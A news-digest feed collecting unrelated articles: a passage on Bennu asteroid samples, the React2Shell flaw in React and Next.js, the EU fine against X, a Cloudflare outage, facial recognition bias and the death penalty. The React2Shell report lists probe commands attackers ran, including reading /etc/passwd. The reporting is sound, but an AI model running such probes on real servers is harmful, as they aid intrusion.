A second paper, in the journal Nature Astronomy led by Scott Sandford at NASA’s Ames Research Center in California’s Silicon Valley and Zack Gainsforth of the University of California, Berkeley, reveals a gum-like material in the Bennu samples never seen before in space rocks – something that could have helped set the stage on Earth for the ingredients of life to emerge. The surprising substance was likely formed in the early days of the solar system, as Bennu’s young parent asteroid warmed.

Once soft and flexible, but since hardened, this ancient “space gum” consists of polymer-like materials extremely rich in nitrogen and oxygen. Such complex molecules could have provided some of the chemical precursors that helped trigger life on Earth, and finding them in the pristine samples from Bennu is important for scientists studying how life began and whether it exists beyond our planet.

Scott SandFord

Astrophysicist, NASA's Ames Research Center

Bennu’s ancestral asteroid formed from materials in the solar nebula – the rotating cloud of gas and dust that gave rise to the solar system – and contained a variety of minerals and ices. As the asteroid began to warm, due to natural radiation, a compound called carbamate formed through a process involving ammonia and carbon dioxide. Carbamate is water soluble, but it survived long enough to polymerize, reacting with itself and other molecules to form larger and more complex chains impervious to water. This suggests that it formed before the parent body warmed enough to become a watery environment.

“With this strange substance, we’re looking at, quite possibly, one of the earliest alterations of materials that occurred in this rock,” said Sandford. “On this primitive asteroid that formed in the early days of the solar system, we’re looking at events near the beginning of the beginning.”

Using an infrared microscope, Sandford’s team selected unusual, carbon-rich grains containing abundant nitrogen and oxygen. They then began what Sandford calls “blacksmithing at the molecular level,” using the Molecular Foundry at Lawrence Berkeley National Laboratory (Berkeley Lab) in Berkeley, California. Applying ultra-thin layers of platinum, they reinforced a particle, welded on a tungsten needle to lift the tiny grain, and shaved the fragment down using a focused beam of charged particles.

When the particle was a thousand times thinner than a human hair, they analyzed its composition via electron microscopy at the Molecular Foundry and X-ray spectroscopy at Berkeley Lab’s Advanced Light Source. The ALS’s high spatial resolution and sensitive X-ray beams enabled unprecedented chemical analysis.

“We knew we had something remarkable the instant the images started to appear on the monitor,” said Gainsforth. “It was like nothing we had ever seen, and for months we were consumed by data and theories as we attempted to understand just what it was and how it could have come into existence.”

The team conducted a slew of experiments to examine the material’s characteristics. As the details emerged, the evidence suggested the strange substance had been deposited in layers on grains of ice and minerals present in the asteroid.

It was also flexible – a pliable material, similar to used gum or even a soft plastic. Indeed, during their work with the samples, researchers noticed the strange material was bendy and dimpled when pressure was applied. The stuff was translucent, and exposure to radiation made it brittle, like a lawn chair left too many seasons in the sun.

“Looking at its chemical makeup, we see the same kinds of chemical groups that occur in polyurethane on Earth,” said Sandford, “making this material from Bennu something akin to a ‘space plastic.’”

The ancient asteroid stuff isn’t simply polyurethane, though, which is an orderly polymer. This one has more “random, hodgepodge connections and a composition of elements that differs from particle to particle,” said Sandford. But the comparison underscores the surprising nature of the organic material discovered in NASA’s asteroid samples, and the research team aims to study more of it.

By pursuing clues about what went on long ago, deep inside an asteroid, scientists can better understand the young solar system – revealing the precursors to and ingredients of life it already contained, and how far those raw materials may have been scattered, thanks to asteroids much like Bennu.

Abundant supernova dust

Another paper in the journal Nature Astronomy , led by Ann Nguyen of NASA’s Johnson Space Center in Houston, analyzed presolar grains – dust from stars predating our solar system – found in two different rock types in the Bennu samples to learn more about where its parent body formed and how it was altered by geologic processes. It is believed that presolar dust was generally well-mixed as our solar system formed. The samples had six-times the amount of supernova dust than any other studied astromaterial, suggesting the asteroid’s parent body formed in a region of the protoplanetary disk enriched in the dust of dying stars.

The study also reveals that, while Bennu’s parent asteroid experienced extensive alteration by fluids, there are still pockets of less-altered materials within the samples that offer insights into its origin.

“These fragments retain a higher abundance of organic matter and presolar silicate grains, which are known to be easily destroyed by aqueous alteration in asteroids,” said Nguyen. “Their preservation in the Bennu samples was a surprise and illustrates that some material escaped alteration in the parent body. Our study reveals the diversity of presolar materials that the parent accreted as it was forming.”

NASA’s Goddard Space Flight Center provided overall mission management, systems engineering, and the safety and mission assurance for OSIRIS-REx. Dante Lauretta of the University of Arizona, Tucson, is the principal investigator. The university leads the science team and the mission’s science observation planning and data processing. Lockheed Martin Space in Littleton, Colorado, built the spacecraft and provided flight operations. Goddard and KinetX Aerospace were responsible for navigating the OSIRIS-REx spacecraft. Curation for OSIRIS-REx takes place at NASA’s Johnson Space Center in Houston. International partnerships on this mission include the OSIRIS-REx Laser Altimeter instrument from CSA (Canadian Space Agency) and asteroid sample science collaboration with JAXA’s (Japan Aerospace Exploration Agency’s) Hayabusa2 mission. OSIRIS-REx is the third mission in NASA’s New Frontiers Program, managed by NASA’s Marshall Space Flight Center in Huntsville, Alabama, for the agency’s Science Mission Directorate in Washington.

For more information on the OSIRIS-REx mission, visit:

https://www.nasa.gov/osiris-rex

Karen Fox / Molly Wasser
Headquarters, Washington
202-285-5155 / 240-419-1732
karen.c.fox@nasa.gov / molly.l.wasser@nasa.gov

React2Shell critical flaw actively exploited in China-linked attacks

Bleeping Computer
www.bleepingcomputer.com
2025-12-05 11:26:07
Multiple China-linked threat actors began exploiting the React2Shell vulnerability (CVE-2025-55182) affecting React and Next.js just hours after the max-severity issue was disclosed. [...]...
Original Article

React2Shell critical flaw actively exploited in China-linked attacks

Multiple China-linked threat actors began exploiting the React2Shell vulnerability (CVE-2025-55182) affecting React and Next.js just hours after the max-severity issue was disclosed.

React2Shell is an insecure deserialization vulnerability in the React Server Components (RSC) 'Flight' protocol. Exploiting it does not require authentication and allows remote execution of JavaScript code in the server's context.

For the Next.js framework, there is the identifier CVE-2025-66478, but the tracking number was rejected in the National Vulnerability Database's CVE list as a duplicate of CVE-2025-55182.

The security issue is easy to leverage, and several proof-of-concept (PoC) exploits have already been published, increasing the risk of related threat activity.

The vulnerability spans several versions of the widely used library, potentially exposing thousands of dependent projects. Wiz researchers say that 39% of the cloud environments they can observe are susceptible to React2Shell attacks.

React and Next.js have released security updates, but the issue is trivially exploitable without authentication and in the default configuration.

React2Shell attacks underway

A report from Amazon Web Services (AWS) warns that the Earth Lamia and Jackpot Panda threat actors linked to China started to exploit React2Shell almost immediately after the public disclosure.

"Within hours of the public disclosure of CVE-2025-55182 (React2Shell) on December 3, 2025, Amazon threat intelligence teams observed active exploitation attempts by multiple China state-nexus threat groups, including Earth Lamia and Jackpot Panda," reads the AWS report .

AWS's honeypots also caught activity not attributed to any known clusters, but which still originates from China-based infrastructure.

Many of the attacking clusters share the same anonymization infrastructure, which further complicates individualized tracking and specific attribution.

Regarding the two identified threat groups, Earth Lamia focuses on exploiting web application vulnerabilities.

Typical targets include entities in the financial services, logistics, retail, IT companies, universities, and government sectors across Latin America, the Middle East, and Southeast Asia.

Jackpot Panda targets are usually located in East and Southeast Asia, and its attacks are aimed at collecting intelligence on corruption and domestic security.

PoCs now available

Lachlan Davidson, the researcher who discovered and reported React2Shell, warned about fake exploits circulating online. However, exploits confirmed as valid by Rapid7 researcher Stephen Fewer and Elastic Security's Joe Desimone have appeared on GitHub.

The attacks that AWS observed leverage a mix of public exploits, including broken ones, along with iterative manual testing and real-time troubleshooting against targeted environments.

The observed activity includes repeated attempts with different payloads, Linux command execution ( whoami , id ), attempts to create files ( /tmp/pwned.txt ), and attempts to read ' /etc/passwd/ .'

"This behavior demonstrates that threat actors aren't just running automated scans, but are actively debugging and refining their exploitation techniques against live targets," comment AWS researchers.

Attack surface management (ASM) platform Assetnote has released a React2Shell scanner on GitHub that can be used to determine if an environment is vulnerable to  React2Shell.

tines

Break down IAM silos like Bitpanda, KnowBe4, and PathAI

Broken IAM isn't just an IT problem - the impact ripples across your whole business.

This practical guide covers why traditional IAM practices fail to keep up with modern demands, examples of what "good" IAM looks like, and a simple checklist for building a scalable strategy.

Elon Musk’s X fined €120m by EU in first clash under new digital laws

Guardian
www.theguardian.com
2025-12-05 11:25:42
Ruling likely to put European Commission on collision course with billionaire, and possibly Donald Trump Elon Musk’s social media platform, X, has been fined €120m (£105m) after it was found in breach of new EU digital laws, in a ruling likely to put the European Commission on a collision course wit...
Original Article

Elon Musk’s social media platform, X, has been fined €120m (£105m) after it was found in breach of new EU digital laws, in a ruling likely to put the European Commission on a collision course with the US billionaire and potentially Donald Trump.

The breaches, under consideration for two years, included what the EU said was a “deceptive” blue tick verification badge given to users and the lack of transparency of the platform’s advertising.

The commission rules require tech companies to provide a public list of advertisers to ensure the company’s structures guard against illegal scams, fake advertisements and coordinated campaigns in the context of political elections.

In a third breach, the EU also concluded that X had failed to provide the required access to public data available to researchers, who typically keep tabs on contentious issues such as political content.

The ruling by the European Commission brings to a close part of an investigation that started two years ago.

The commission said on Friday it had found X in breach of transparency obligations under the Digital Services Act (DSA), in the first ruling against the company since the laws regulating the content of social media and large tech platforms came into force in 2023.

In December 2023, the commission opened formal proceedings to assess whether X may have breached the DSA in areas linked to the dissemination of illegal content and the effectiveness of the measures taken to combat information manipulation, for which the investigation continues.

Under the DSA, X can be fined up to 6% of its worldwide revenue, which was estimated to be between $2.5bn (£1.9bn) and $2.7bn in 2024.

Three other investigations remain, two of which relate to the content and the algorithms promoting content that changed after Musk bought Twitter in October 2022 and rebranded it X.

The commission continues to investigate whether there have been breaches of laws prohibiting incitement to violence or terrorism.

It is also looking into the mechanism for users to flag and report what they believe is illegal content.

Senior officials said the fine broke down into three sections: €45m for introducing a “verification” blue tick that users could buy, leaving others unable to determine the authenticity of account holders; €35m for breaches of ad regulations; and €40m for data access breaches in relation to research.

Before Musk took over Twitter, blue ticks were only awarded to verifiable account holders, including politicians, celebrities, public bodies and verified journalists in mainstream media and established new media, such as bloggers and YouTubers. After the takeover, users who subscribed to X Premium were then eligible for blue tick status .

Henna Virkkunen, who is the executive vice-president at the European Commission responsible for tech regulation, said: “With the DSA’s first non-compliance decision, we are holding X responsible for undermining users’ rights and evading accountability.

“Deceiving users with blue checkmarks, obscuring information on ads and shutting out researchers have no place online in the EU.”

The ruling risks enraging Trump’s administration. Last week the US commerce secretary, Howard Lutnick, said the EU must consider its tech regulations in order to get 50% tariffs on steel reduced.

skip past newsletter promotion

His threats were branded “blackmail” by Teresa Ribera, the EU commissioner in charge of Europe’s green transition and antitrust enforcement.

Senior EU officials said the ruling was independent of any pleadings by the US delegation in Brussels last week to meet trade ministers. They said the EU retained its “sovereign right” to regulate US tech companies, with 25 businesses including non-US companies such as TikTok coming under the DSA.

Musk – who is on a path to become the world’s first trillionaire – has 90 days to come up with an “action plan” to respond to the fine but ultimately he is also free to appeal against any EU ruling, as others, such as Apple, have done in the past, taking their case to the European court of justice.

At the same time, the EU has announced it has secured commitments from TikTok to provide advertising repositories to address the commission concerns raised in May about transparency.

The DSA requires platforms to maintain an accessible and searchable repository of the ads running on their services to allow researchers and representatives of civil society “to detect scams, advertisements for illegal or age-inappropriate”.

Senior officials said the phenomenon of fake political adverts or ads with fake celebrities cannot be studied unless the social media companies stick to the rules.

X has been approached for comment. The EU said the company had been informed of the decision.

Cloudflare outage hits major web services including X, LinkedIn and Zoom – business live

Guardian
www.theguardian.com
2025-12-05 11:19:46
Cloudflare reports it is investigating issues with Cloudflare Dashboard and related APIs Technical problems at internet infrastructure provider Cloudflare today have taken a host of websites offline this morning. Cloudflare said shortly after 9am UK time that it “is investigating issues with Cloudfl...
Original Article

Global websites down as Cloudflare investigates fresh issues

Technical problems at internet infrastructure provider Cloudflare today have taken a host of websites offline this morning.

Cloudflare said shortly after 9am UK time that it “is investigating issues with Cloudflare Dashboard and related APIs [application programming interfaces – used when apps exchange data with each other].

Cloudflare has also reported it has implemented a potential fix to the issue and is monitoring the results.

But the outage has affected a number of websites and platforms, with reports of problems accessing LinkedIn, X, Canva – and even the DownDetector site used to monitor online service issues.

Last month, an outage at Cloudflare made many websites inaccessible for about three hours.

Key events

Please turn on JavaScript to use this feature

Jake Moore , global cybersecurity adviser at ESET , has summed up the problem:

“If a major provider like Cloudflare goes down for any reason, thousands of websites instantly become unreachable.

“The problems often lie with the fact we are using an old network to direct internet users around the world to websites but it simply highlights there is one huge single point of failure in this legacy design.”

The Metro newspaper reports that shopping sites wer affected by the Cloudflare IT problems too – such as Shopify, Etsy, Wayfair, and H&M.

H&M’s website is slow to load right now, but the other three seem to be working…

Today’s Cloudflare outage is likely to intensify concerns that internet users are relying on too few technology providers.

Tim Wright, technology partner at Fladgate , explains:

“Cloudflare’s latest outage is another reminder that much of the internet runs through just a few hands. Businesses betting on “always-on” cloud resilience are discovering its single points of failure. Repeated disruptions will draw tougher scrutiny from regulators given DORA, NIS2, and the UK’s emerging operational resilience regimes.

Dependence on a small set of intermediaries may be efficient but poses a structural risk the digital economy cannot ignore. We can expect regulators to probe the concentration of critical functions in the cloud and edge layers — while businesses rethink whether convenience has quietly outpaced control.”

Cloudflare: this was not an attack

Cloudflare’s System Status page shows that the problem that knocked many websites offline has been resolved.

Cloudflare insists the problem was not a cyber attack; instead, it appears to have been caused by a deliberate change made by its firewall handles data requests, to fix a security vulnerability.

Cloudflare says:

This incident has been resolved.

A change made to how Cloudflare’s Web Application Firewall parses requests caused Cloudflare’s network to be unavailable for several minutes this morning. This was not an attack; the change was deployed by our team to help mitigate the industry-wide vulnerability disclosed this week in React Server Components. We will share more information as we have it today.

Edinburgh Airport suspends all flights after IT issue with air traffic control

An IT issue affecting air traffic control has forced Edinburgh Airport to halt all flights today.

Edinburgh Airport said in a statement:

“No flights are currently operating from Edinburgh Airport.

“Teams are working on the issue and will resolve as soon as possible.”

The Airport’s departure page is showing eight flights delayed and five cancelled, but passengers for many other flights are being told to go to the gate.

Reports of problems at Cloudflare peaked at just after 9am UK time:

A chart showing reports of problems with Cloudflare
A chart showing reports of problems with Cloudflare Photograph: Downdetector

Online video conferencing service Zoom, and Transport for London’s website (used for travel information in the capital), are among the sites hit by the Cloudflare outage.

Global websites down as Cloudflare investigates fresh issues

Technical problems at internet infrastructure provider Cloudflare today have taken a host of websites offline this morning.

Cloudflare said shortly after 9am UK time that it “is investigating issues with Cloudflare Dashboard and related APIs [application programming interfaces – used when apps exchange data with each other].

Cloudflare has also reported it has implemented a potential fix to the issue and is monitoring the results.

But the outage has affected a number of websites and platforms, with reports of problems accessing LinkedIn, X, Canva – and even the DownDetector site used to monitor online service issues.

Last month, an outage at Cloudflare made many websites inaccessible for about three hours.

In a separate cereal supply and demand report, the FAO raised its global cereal production forecast for 2025 to a record 3.003 billion metric tons.

That’s up from 2.990 billion tons projected last month, mainly due to increased estimates for wheat output.

The FAO’s forecast for world cereal stocks at the end of the 2025/26 season has also been revised up to a record 925.5 million tons, reflecting expectations of expanded wheat stocks in China and India as well as higher coarse grain stocks in exporting countries.

World food prices fall for third month in a row

Global food prices have fallen for the third month running.

The UN’s Food Price Index, which tracks a basket of food commodities, dropped by 1.2% in November, thanks to a drop in the cost of dairy products, meat, sugar and vegetable oils.

That could help to push down inflation, if these reductions are passed onto consumers.

A chart showing world food prices
Photograph: UN FAO

However, cereal prices rose by 1.8% last month, due to “potential Chinese interest in supplies from the United States of America, concerns over continuing hostilities in the Black Sea region, and expectations of reduced plantings in the Russian Federation”, the UN’s Food and Agriculture Organisation reports.

Vegetable oil prices fell by 2.6% in the month, to a five-month low, due to prices of palm, rapeseed and sunflower oils.

Meat prices dropped by 0.8%, driven by lower pig and poultry meat prices and the the removal of tariffs on beef imports into the US.

A chart showing world food prices
Photograph: UN FAO

Dairy prices fell by 3.1% in November, thanks to rising milk production and abundant export supplies in key producing regions, supported by ample butter and skim milk powder inventories in the European Union and seasonally higher output in New Zealand.

Sugar prices dropped by 5.9% in the month, and were almost 30% lower than a year ago., as expectations of ample global sugar supplies in the current season pushed down prices. Strong production in Brazil’s key southern growing regions, a good early season start to India’s harvest and favourable crop prospects in Thailand all contributed.

European shares higher ahead of US PCE inflation report

European stock markets are ending the week on the front foot.

The main European indices are a little higher this morning; Germany’s DAX is up 0.55%, France’s CAC 40 is 0.3% higher, and the UK’s FTSE 100 has risen by 0.14%.

Investors are waiting for new US inflation data later today (1.30pm UK time), which could influence interest rate expectations ahead of next week’s US Federal Reserve meeting.

Kyle Rodda, senior financial market analyst at capital . com, says:

Risk assets are cautiously edging higher to round out the week, with US PCE Index data in focus this afternoon.

Ultimately, the markets appear to be looking for a signal that it’s all clear to keep moving higher again. That signal could come from data. But given the lack of it between now and the middle of next week, it’s more likely to come from the FOMC decision.

The current implied probabilities of a cut are 87%, according to FedWatch – swaps markets suggest a little higher. The markets won’t just want to see a cut delivered but also some dovish enough language and forecasts about the prospect of future cuts. Another hawkish cut, like that which was seen in October, could upset the apple cart, if it were to occur.

Nevertheless, European stocks have run with a broadly positive lead-in from Asian markets, with US futures also pointing higher

Mark Sweney

Mark Sweney

Warner Bros Discovery has entered exclusive talks to sell its streaming and Hollywood studio business to Netflix, a move that would dramatically change the established film and TV landscape.

Netflix is in competition with Paramount Skydance and Comcast, which owns assets including Universal Studios and Sky, to buy the owner of the Hollywood studio Warner Bros , HBO and the HBO Max streaming service.

Netflix is offering a $5bn (£3.7bn) breakup fee if the deal fails to gain regulatory approval in the US, according to Bloomberg, which first reported the exclusive talks.

Ocado shares jump 11% after agreeing $350m payment from Kroger

Shares in Ocado have jumped by over 10% at the start of trading, after it agreed a compensation deal with US grocer Kroger.

Ocado is to receive a one-off $350m cash payment from Kroger , which decided last month to close three robotic warehouses which use the UK company’s high-tech equipment, in Maryland, Wisconsin, and Florida.

That decision, announced in mid-November , had knocked 17% off Ocado’s shares.

This morning, though, they’ve jumped to the top of the FTSE 250 index, up 11.5% to 206p.

Ocado had previously said it expected to receive more than $250m in compensation from Kroger .

But it has also revealed today that Kroger has decided to cancel another tie-up with Ocado – a planned automated distribution centre run on the UK group’s technology in Charlotte, North Carolina.

Last month, retail analyst Clive Black of Shore Capital said Ocado was “being marginalised as most of its customer fulfilment centres do not work economically in the USA”.

Ocado says it continues to “work closely” with Kroger on five other customer fulfillment centres in US states such as Texas and Michigan.

Tim Steiner , CEO of Ocado Group , has said:

“We continue to invest significant resources to support our partners at Kroger, and to help them build on our longstanding partnership. Ocado’s technology has evolved significantly to include both the new technologies that Kroger is currently deploying in its CFC network, as well as new fulfilment products that bring Ocado’s technology to a wider range of applications, including Store Based Automation to support ‘pick up’ and immediacy.”

Our partners around the world have already deployed a wide range of these fulfilment technologies to great effect, enabling them to address a wide spectrum of geographies, population densities and online shopping missions, underpinned by Ocado’s world leading expertise and R&D capabilities. We remain excited about the opportunity for Ocado’s evolving products in the US market.”

House prices predicted to rise in 2026, after budget uncertainty

Halifax’s Amanda Bryden reckons UK house prices will rise “gradually” next year, saying:

“Looking ahead, with market activity steady and expectations of further interest rate reductions to come, we anticipate property prices will continue to grow gradually into 2026.”

Karen Noye , mortgage expert at Quilter , says affordability remains the biggest hurdle, even though inflation has eased and another interest rate cut is expected later this month, adding:

The outlook for 2026 rests on the path of mortgage rates and the resilience of household incomes. Greater clarity post budget and the prospect of lower borrowing costs give the market a firmer footing, but affordability will remain the defining constraint.”

Tom Bill , head of UK residential research at Knight Frank , blames pre-Budget uncertainty pushed house price growth close to zero, adding:

Clarity has now returned, but an array of tax rises, which include an income tax threshold freeze, will increasingly squeeze demand and prices. Offsetting that is the fact that mortgage rates are expected to drift lower next year as the base rate bottoms out at around 3.25%.”

Technically, UK house prices did rise slightly last month. On Halifax’s data, the average price was £299,892, marginally up from £299,754 in October. That’s a new record high on this index.

Halifax: a clear North/South divide on house price changes

Halifax’s regional data continues to show a clear North/South divide – prices fell in the south of the UK last month, but were stronger elsewhere.

  • Northern Ireland remains the strongest performing nation or region in the UK, with average property prices rising by +8.9% over the past year (up from +7.9% last month). The typical home now costs £220,716.

  • Scotland recorded annual price growth of +3.7% in November, up to an average of £216,781. In Wales property values rose +1.9% year-on-year to £229,430.

  • In England, the North West recorded the highest annual growth rate, with property prices rising by +3.2% to £245,070, followed by the North East with growth of +2.9% to £180,939. Further south, three regions saw prices decrease in November.

  • In London prices fell by -1.0%, the South East by -0.3% and Eastern England by -0.1%. The capital remains the most expensive part of the UK, with an average property now costing £539,766.

Introduction: UK house prices stagnated in November, weak retail spending too

Good morning, and welcome to our rolling coverage of business, the financial markets and the world economy.

As the first week of December draws to a close, we have fresh evidence that the economy cooled in the run-up to last month’s budget.

UK house prices were broadly unchanged in November, lender Halifax reports, with that average property changing hands for £299,892. That stagnation follows a 0.5% rise in October, and makes houses slightly more affordable to new buyers.

On an annual basis, prices were 0.7% higher – down from +1.9% house price inflation in October.

Amanda Bryden , head of mortgages at Halifax , explains:

“This consistency in average prices reflects what has been one of the most stable years for the housing market over the last decade. Even with the changes to Stamp Duty back in spring and some uncertainty ahead of the Autumn Budget, property values have remained steady.

While slower growth may disappoint some existing homeowners, it’s welcome news for first-time buyers. Comparing property prices to average incomes, affordability is now at its strongest since late 2015. Taking into account today’s higher interest rates, mortgage costs as a share of income are at their lowest level in around three years.

A chart showing UK house prices
A chart showing UK house prices Photograph: Halifax

Shoppers also reined in their spending in the shops last month.

A survey by business advisory service BDO has found that in-store sales grew by just +1.3% in November, despite the potential sales boost from Black Friday.

That is well below the rate of inflation which means that sales volumes are significantly down, BDO says.

The agenda

  • 7am GMT: Halifax house price index for November

  • 7am GMT: German factory orders data for October

  • 8.30am GMT: UN food commodities price index

  • 3pm GMT: US PCE inflation report

  • 3pm GMT: University of Michigan consumer confidence report

LISP Style & Design

Lobsters
archive.org
2025-12-05 11:12:00
Comments...
Original Article

LISP STYLE & DESIGN explores the process of style in the development of Lisp programs.  Style comprises efficient algorithms. good organization. appropriate abstractions. well-constructed
function definitions, useful commentary. and effective debugging. Good design and style enhance programming efficiency because they make programs easier to understand, to debug, and to maintain.

A special feature of this book is the large programming example that the authors use throughout to illustrate how the process develops: organizing the approach, choosing constructs, using abstractions, structuring files, debugging code, and improving program efficiency. Lisp programmers, symbolic programmers or those intrigued by symbolic programming,

as well as students of Lisp should consider this book an essential addition to their libraries.

Molly M. Miller is Manager of Technical Publications and Training for Lucid, Inc. She holds degrees in Computer Science, Mathematics, and English and has done graduate work in symbolic and heuristic computation at Stanford University.

Eric Benson is Principal Scientist at Lucid, Inc. He is a graduate of the University of Utah with a degree in mathematics and is a co-founder of Lucid.

Home Office admits facial recognition tech issue with black and Asian subjects

Guardian
www.theguardian.com
2025-12-05 11:11:18
Calls for review after technology found to return more false positives for ‘some demographic groups’ on certain settingsUK politics live – latest updatesMinisters are facing calls for stronger safeguards on the use of facial recognition technology after the Home Office admitted it is more likely to ...
Original Article

Ministers are facing calls for stronger safeguards on the use of facial recognition technology after the Home Office admitted it is more likely to incorrectly identify black and Asian people than their white counterparts on some settings.

Following the latest testing conducted by the National Physical Laboratory (NPL) of the technology’s application within the police national database, the Home Office said it was “more likely to incorrectly include some demographic groups in its search results”.

Police and crime commissioners said publication of the NPL’s finding “sheds light on a concerning inbuilt bias” and urged caution over plans for a national expansion.

The findings were released on Thursday, hours after Sarah Jones, the policing minister, had described the technology as the “biggest breakthrough since DNA matching”.

Facial recognition technology scans people’s faces and then cross-references the images against watchlists of known or wanted criminals. It can be used while examining live footage of people passing cameras, comparing their faces with those on wanted lists, or be used by officers to target individuals as they walk by mounted cameras.

Images of suspects can also be run retrospectively through police, passport or immigration databases to identify them and check their backgrounds.

Analysts who examined the police national database’s retrospective facial recognition technology tool at a lower setting found that “the false positive identification rate (FPIR) for white subjects (0.04%) is lower than that for Asian subjects (4.0%) and black subjects (5.5%)”.

The testing went on to find that the number of false positives for black women was particularly high. “The FPIR for black male subjects (0.4%) is lower than that for black female subjects (9.9%),” the report said.

The Association of Police and Crime Commissioners said in a statement that the findings showed an inbuilt bias. It said: “This has meant that in some circumstances it is more likely to incorrectly match black and Asian people than their white counterparts. The language is technical but behind the detail it seems clear that technology has been deployed into operational policing without adequate safeguards in place.”

The statement, signed off by the APCC leads Darryl Preston, Alison Lowe, John Tizard and Chris Nelson, questioned why the findings had not been released at an earlier opportunity or shared with black and Asian communities.

It said: “Although there is no evidence of adverse impact in any individual case, that is more by luck than design. System failures have been known for some time, yet these were not shared with those communities affected, nor with leading sector stakeholders.”

The government announced a 10-week public consultation that it hopes will pave the way for the technology to be used more often. The public will be asked whether police should be able to go beyond their records to access other databases, including passport and driving licence images, to track down criminals.

Civil servants are working with police to establish a new national facial recognition system that will hold millions of images.

skip past newsletter promotion

Charlie Whelton, a policy and campaigns officer for the campaign group Liberty, said: “The racial bias in these stats shows the damaging real-life impacts of letting police use facial recognition without proper safeguards in place. With thousands of searches a month using this discriminatory algorithm, there are now serious questions to be answered over just how many people of colour were falsely identified, and what consequences this had.

“This report is yet more evidence that this powerful and opaque technology cannot be used without robust safeguards in place to protect us all, including real transparency and meaningful oversight. The government must halt the rapid rollout of facial recognition technology until these are in place to protect each of us and prioritise our rights – something we know the public wants.”

The former cabinet minister David Davis raised concerns after police leaders said the cameras could be placed at shopping centres, stadiums and transport hubs to hunt for wanted criminals. He told the Daily Mail : “Welcome to big brother Britain. It is clear the government intends to roll out this dystopian technology across the country. Something of this magnitude should not happen without full and detailed debate in the House of Commons.”

Officials say the technology is needed to help catch serious offenders. They say there are manual safeguards, written into police training, operational practice and guidance, that require all potential matches returned from the police national database to be visually assessed by a trained user and investigating officer.

A Home Office spokesperson said: “The Home Office takes the findings of the report seriously and we have already taken action. A new algorithm has been independently tested and procured, which has no statistically significant bias. It will be tested early next year and will be subject to evaluation.

“Given the importance of this issue, we have also asked the police inspectorate, alongside the forensic science regulator, to review law enforcement’s use of facial recognition. They will assess the effectiveness of the mitigations, which the National Police Chiefs’ Council supports.”

Why We Can't Quit Excel

Hacker News
www.bloomberg.com
2025-12-05 11:07:07
Comments...
Original Article

We've detected unusual activity from your computer network

To continue, please click the box below to let us know you're not a robot.

Why did this happen?

Please make sure your browser supports JavaScript and cookies and that you are not blocking them from loading. For more information you can review our Terms of Service and Cookie Policy .

Need Help?

For inquiries related to this message please contact our support team and provide the reference ID below.

Block reference ID:a61d3043-d1d5-11f0-808e-53034710ccbc

Get the most important global markets news at your fingertips with a Bloomberg.com subscription.

SUBSCRIBE NOW

Lethal Illusion: Understanding the Death Penalty Apparatus

Intercept
theintercept.com
2025-12-05 11:00:00
Malcolm Gladwell and Liliana Segura unpack how the death penalty is administered in America. The post Lethal Illusion: Understanding the Death Penalty Apparatus appeared first on The Intercept....
Original Article

As of December 1, officials across the U.S. have executed 44 people in 11 states, making 2025 one of the deadliest years for state-sanctioned executions in recent history. According to the Death Penalty Information Center, three more people are scheduled for execution before the new year.

The justification for the death penalty is that it’s supposed to be the ultimate punishment for the worst crimes. But in reality, who gets sentenced to die depends on things that often have nothing to do with guilt or innocence.

Historically, judges have disproportionately sentenced Black and Latino people to death. A new report from the American Civil Liberties Union released in November found that more than half of the 200 people exonerated from death row since 1973 were Black.

Executions had been on a steady decline since their peak in the late 1990s . But the numbers slowly started to creep back up in recent years, more than doubling from 11 in 2021 to 25 last year, and we’ve almost doubled that again this year. Several states have stood out in their efforts to ramp up executions and conduct them at a faster pace — including Alabama .

Malcolm Gladwell’s new podcast series “ The Alabama Murders ” dives into one case to understand what the system really looks like and how it operates. Death by lethal injection involves a three-drug protocol: a sedative, a paralytic, and, lastly, potassium chloride, which is supposed to stop the heart. Gladwell explains to Intercept Briefing host Akela Lacy how it was developed, “It was dreamt up in an afternoon in Oklahoma in the 1970s by a state senator and the Oklahoma medical examiner who were just spitballing about how they might replace the electric chair with something ‘more humane.’ And their model was why don’t we do for humans what we do with horses?”

Liliana Segura , an Intercept senior reporter who has covered capital punishment and criminal justice for two decades , adds that the protocol is focused on appearances. “It is absolutely true that these are protocols that are designed with all of these different steps and all of these different parts and made to look, using the tools of medicine to kill … like this has really been thought through.” She says, “These were invented for the purpose of having a humane-appearing protocol, a humane-appearing method, and it amounts to junk science.”

Listen to the full conversation of The Intercept Briefing on Apple Podcasts , Spotify , or wherever you listen.

Transcript

Akela Lacy: Malcolm and Liliana, welcome to the show.

Malcolm Gladwell: Thank you.

Liliana Segura: Thank you.

AL: Malcolm, the series starts by recounting the killing of Elizabeth Sennett, but very quickly delves into what happens to the two men convicted of killing her, John Parker and Kenny Smith. You spend a lot of time in this series explaining, sometimes in graphic detail, how the cruelty of the death penalty isn’t only about the execution, but also about the system around it — the paperwork, the waiting. This is not the kind of subject matter that you typically tackle. What drew you to wanting to report on the death penalty and criminal justice?

MG: I wasn’t initially intending to do a story about the death penalty. I, on a kind of whim, spent a lot of time with Kate Porterfield, who’s the psychologist who studies trauma, who shows up halfway through “The Alabama Murders.”

I was just interviewing her about, because I was interested in the treatment of traumatized people, and she just happened to mention that she’d been involved with the death penalty case — and her description of it was so moving and compelling that I realized, oh, that’s the story I want to tell. But this did not start as a death penalty project. It started as an exploration of a psychologist’s work, and it kind of took a detour.

AL: Tell us a little bit more about how the bureaucracy around the death penalty masks its inherent cruelty.

MG: There’s a wonderful phrase that one of the people we interviewed, Joel Zivot, uses. He talks about how the death penalty — he was talking about lethal injection, but this is also true of nitrogen gas — he said it is the impersonation of a medical act. And I think that phrase speaks volumes, that a lot of what is going on here is a kind of performance that is for the benefit of the viewer. It has to look acceptable to those who are watching, to those who are in society who are judging or observing the process.

“They’re interested in the impersonation of a medical act, not the implementation of a medical act.”

It is the management of perception that is compelling and driving the behavior here — not the actual treatment of the condemned prisoner him/herself. And once you understand that, oh, it’s a performance, then a lot of it makes sense.

One of the crucial moments in the story we tell is, where there is a hearing in which the attorneys for Kenny Smith are trying to get a stay of execution, and they start asking the state of Alabama, the corrections people in the state of Alabama to explain, did they understand what they would do? They were contemplating the use of nitrogen gas. Did they ever talk to a doctor about the risks associated with it? Did they ever contemplate any of the potential side effects ? And it turns out they had done none of that. And it makes sense when you realize that’s not what they’re interested in.

They’re interested in the impersonation of a medical act, not the implementation of a medical act. The bureaucracy is there to make it look good, and that was one of the compelling lessons of the piece.

AL: And it’s impersonating a medical act with people who are not doctors, right? Like people who are not, do not have this training.

